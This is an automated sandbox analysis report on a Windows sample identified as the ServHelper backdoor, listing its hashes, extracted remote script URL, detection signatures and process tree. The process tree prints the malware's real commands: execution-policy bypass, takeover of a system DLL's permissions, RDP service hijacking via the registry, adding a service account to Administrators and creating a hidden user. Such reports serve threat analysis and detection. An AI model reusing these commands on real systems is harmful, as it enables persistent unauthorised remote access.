Analysis
max time kernel: 144s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29-03-2024 11:44

Static task: static1

Behavioral task: behavioral1
  Sample: 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
  Resource: win10v2004-20231215-en
General
Target: 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
Size: 5.7MB
MD5: 211ca7c8d5fd20f7dcaebdbe354662be
SHA1: 1111e864f3e9d2e6879c5179c4136638b05b67c9
SHA256: aefb4a2472f0517d58cae7e5e0c9c51b4e36b39f6096dbffc6b8cc18d0be7175
SHA512: d7e6e638cdfd4792a09d671f4e61de715a63a9001283594e6c73d5a88dfc8b91d201fc19b1228b7b1a654f9abb8cf52893d3cc02aea142a1c5c7b9d3f876e24f
SSDEEP: 49152:sr/U2Wrb/T/vO90dL3BmAFd4A64nsfJ1gBO55+1TEf1q7NOVuZnsm/QBrkdL+DLk:srDnOOWmAQQQQQQQQQQQQQ
Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (7 IoCs)
Processes: powershell.exe
flow | pid | process
25 | 3920 | powershell.exe
28 | 3920 | powershell.exe
31 | 3920 | powershell.exe
35 | 3920 | powershell.exe
37 | 3920 | powershell.exe
39 | 3920 | powershell.exe
41 | 3920 | powershell.exe

Modifies RDP port number used by Windows (1 TTPs)
Possible privilege escalation attempt (8 IoCs)
Processes: icacls.exe, takeown.exe
pid | process
3152 | icacls.exe
1084 | icacls.exe
3172 | icacls.exe
4660 | icacls.exe
3648 | icacls.exe
2268 | takeown.exe
4208 | icacls.exe
4344 | icacls.exe

Sets DLL path for service in the registry (2 TTPs, 1 IoCs)
Processes: reg.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | reg.exe

Loads dropped DLL (2 IoCs)
pid | process
4444 | 4444

Modifies file permissions (1 TTPs, 8 IoCs)
Processes: icacls.exe, takeown.exe
pid | process
4660 | icacls.exe
3648 | icacls.exe
2268 | takeown.exe
4208 | icacls.exe
4344 | icacls.exe
3152 | icacls.exe
1084 | icacls.exe
3172 | icacls.exe

resource | yara_rule
C:\Windows\Branding\mediasrv.png | upx
C:\Windows\Branding\mediasvc.png | upx
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)

Drops file in System32 directory (1 IoCs)
Processes: powershell.exe
description | ioc | process
File created | C:\Windows\system32\rfxvmt.dll | powershell.exe

Drops file in Program Files directory (4 IoCs)
Processes: powershell.exe
description | ioc | process
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe

Drops file in Windows directory (18 IoCs)
Processes: powershell.exe
description | ioc | process
File opened for modification | C:\Windows\branding\shellbrd | powershell.exe
File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F13.tmp | powershell.exe
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F34.tmp | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_n53vzy1y.wsy.ps1 | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ueazsxbf.vnf.psm1 | powershell.exe
File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F24.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F45.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F56.tmp | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine videocard installed.

Modifies data under HKEY_USERS (64 IoCs)
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 0deb0d6e8a2fda01 | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 | powershell.exe
Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (2 IoCs)
Uses user-agent string associated with script host/environment.
description | flow | ioc
HTTP User-Agent header | 28 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 31 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes: powershell.exe
pid | process
2104 | powershell.exe
2104 | powershell.exe
3168 | powershell.exe
3168 | powershell.exe
4932 | powershell.exe
4932 | powershell.exe
4580 | powershell.exe
4580 | powershell.exe
2104 | powershell.exe
2104 | powershell.exe
2104 | powershell.exe
3920 | powershell.exe
3920 | powershell.exe
3920 | powershell.exe

Suspicious behavior: LoadsDriver (2 IoCs)
pid | process
656 | 656

Suspicious use of AdjustPrivilegeToken (18 IoCs)
Processes: powershell.exe, icacls.exe, WMIC.exe
description | pid | process
Token: SeDebugPrivilege | 2104 | powershell.exe
Token: SeDebugPrivilege | 3168 | powershell.exe
Token: SeDebugPrivilege | 4932 | powershell.exe
Token: SeDebugPrivilege | 4580 | powershell.exe
Token: SeRestorePrivilege | 4344 | icacls.exe
Token: SeAssignPrimaryTokenPrivilege | 1464 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1464 | WMIC.exe
Token: SeAuditPrivilege | 1464 | WMIC.exe
Token: SeAssignPrimaryTokenPrivilege | 1464 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1464 | WMIC.exe
Token: SeAuditPrivilege | 1464 | WMIC.exe
Token: SeAssignPrimaryTokenPrivilege | 1232 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1232 | WMIC.exe
Token: SeAuditPrivilege | 1232 | WMIC.exe
Token: SeAssignPrimaryTokenPrivilege | 1232 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1232 | WMIC.exe
Token: SeAuditPrivilege | 1232 | WMIC.exe
Token: SeDebugPrivilege | 3920 | powershell.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes: 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe, powershell.exe, csc.exe, net.exe, cmd.exe
description | pid | process | target process
PID 2044 wrote to memory of 2104 | 2044 | 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe | powershell.exe
PID 2044 wrote to memory of 2104 | 2044 | 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe | powershell.exe
PID 2104 wrote to memory of 1688 | 2104 | powershell.exe | csc.exe
PID 2104 wrote to memory of 1688 | 2104 | powershell.exe | csc.exe
PID 1688 wrote to memory of 4372 | 1688 | csc.exe | cvtres.exe
PID 1688 wrote to memory of 4372 | 1688 | csc.exe | cvtres.exe
PID 2104 wrote to memory of 3168 | 2104 | powershell.exe | powershell.exe
PID 2104 wrote to memory of 3168 | 2104 | powershell.exe | powershell.exe
PID 2104 wrote to memory of 4932 | 2104 | powershell.exe | powershell.exe
PID 2104 wrote to memory of 4932 | 2104 | powershell.exe | powershell.exe
PID 2104 wrote to memory of 4580 | 2104 | powershell.exe | powershell.exe
PID 2104 wrote to memory of 4580 | 2104 | powershell.exe | powershell.exe
PID 2104 wrote to memory of 2268 | 2104 | powershell.exe | takeown.exe
PID 2104 wrote to memory of 2268 | 2104 | powershell.exe | takeown.exe
PID 2104 wrote to memory of 4208 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 4208 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 4344 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 4344 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 3152 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 3152 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 1084 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 1084 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 3172 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 3172 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 4660 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 4660 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 3648 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 3648 | 2104 | powershell.exe | icacls.exe
PID 2104 wrote to memory of 4368 | 2104 | powershell.exe | reg.exe
PID 2104 wrote to memory of 4368 | 2104 | powershell.exe | reg.exe
PID 2104 wrote to memory of 976 | 2104 | powershell.exe | reg.exe
PID 2104 wrote to memory of 976 | 2104 | powershell.exe | reg.exe
PID 2104 wrote to memory of 2336 | 2104 | powershell.exe | reg.exe
PID 2104 wrote to memory of 2336 | 2104 | powershell.exe | reg.exe
PID 2104 wrote to memory of 3356 | 2104 | powershell.exe | net.exe
PID 2104 wrote to memory of 3356 | 2104 | powershell.exe | net.exe
PID 3356 wrote to memory of 428 | 3356 | net.exe | net1.exe
PID 3356 wrote to memory of 428 | 3356 | net.exe | net1.exe
PID 2104 wrote to memory of 3384 | 2104 | powershell.exe | cmd.exe
PID 2104 wrote to memory of 3384 | 2104 | powershell.exe | cmd.exe
PID 3384 wrote to memory of 3656 | 3384 | cmd.exe | cmd.exe
PID 3384 wrote to memory of 3656 | 3384 | cmd.exe | cmd.exe
PID 3656 wrote to memory of 1368 | 3656 | cmd.exe | net.exe
PID 3656 wrote to memory of 1368 | 3656 | cmd.exe | net.exe
PID 1368 wrote to memory of 336 | 1368 | net.exe | net1.exe
PID 1368 wrote to memory of 336 | 1368 | net.exe | net1.exe
PID 2104 wrote to memory of 3772 | 2104 | powershell.exe | cmd.exe
PID 2104 wrote to memory of 3772 | 2104 | powershell.exe | cmd.exe
PID 3772 wrote to memory of 4636 | 3772 | cmd.exe | cmd.exe
PID 3772 wrote to memory of 4636 | 3772 | cmd.exe | cmd.exe
PID 4636 wrote to memory of 4948 | 4636 | cmd.exe | net.exe
PID 4636 wrote to memory of 4948 | 4636 | cmd.exe | net.exe
PID 4948 wrote to memory of 640 | 4948 | net.exe | net1.exe
PID 4948 wrote to memory of 640 | 4948 | net.exe | net1.exe
PID 1648 wrote to memory of 2880 | 1648 | cmd.exe | net.exe
PID 1648 wrote to memory of 2880 | 1648 | cmd.exe | net.exe
PID 2880 wrote to memory of 1900 | 2880 | net.exe | net1.exe
PID 2880 wrote to memory of 1900 | 2880 | net.exe | net1.exe
PID 4480 wrote to memory of 4056 | 4480 | cmd.exe | net.exe
PID 4480 wrote to memory of 4056 | 4480 | cmd.exe | net.exe
PID 4056 wrote to memory of 2120 | 4056 | net.exe | net1.exe
PID 4056 wrote to memory of 2120 | 4056 | net.exe | net1.exe
PID 3660 wrote to memory of 4372 | 3660 | cmd.exe | net.exe
PID 3660 wrote to memory of 4372 | 3660 | cmd.exe | net.exe
Processes
(each entry: [depth] image path, then its command line and the signatures it triggered; children are indented under their parent)

[1] C:\Users\Admin\AppData\Local\Temp\211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.cmdline"
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES515C.tmp" "c:\Users\Admin\AppData\Local\Temp\nvb2al1r\CSC3B066624B2AE420C8E6B3E287BE0BE1.TMP"

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\takeown.exe
        Command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        - Possible privilege escalation attempt
        - Modifies file permissions

    [3] C:\Windows\system32\icacls.exe
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        - Possible privilege escalation attempt
        - Modifies file permissions

    [3] C:\Windows\system32\icacls.exe
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\icacls.exe
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        - Possible privilege escalation attempt
        - Modifies file permissions

    [3] C:\Windows\system32\icacls.exe
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        - Possible privilege escalation attempt
        - Modifies file permissions

    [3] C:\Windows\system32\icacls.exe
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        - Possible privilege escalation attempt
        - Modifies file permissions

    [3] C:\Windows\system32\icacls.exe
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        - Possible privilege escalation attempt
        - Modifies file permissions

    [3] C:\Windows\system32\icacls.exe
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        - Possible privilege escalation attempt
        - Modifies file permissions

    [3] C:\Windows\system32\reg.exe
        Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

    [3] C:\Windows\system32\reg.exe
        Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Sets DLL path for service in the registry
        - Modifies registry key

    [3] C:\Windows\system32\reg.exe
        Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

    [3] C:\Windows\system32\net.exe
        Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

    [3] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\cmd.exe
          Command line: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\net.exe
            Command line: net start rdpdr
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 start rdpdr

    [3] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\cmd.exe
          Command line: cmd /c net start TermService
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\net.exe
            Command line: net start TermService
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 start TermService

    [3] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

    [3] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      Command line: net.exe user WgaUtilAcc 000000 /del
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe user WgaUtilAcc rbAwK2ZR /add
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
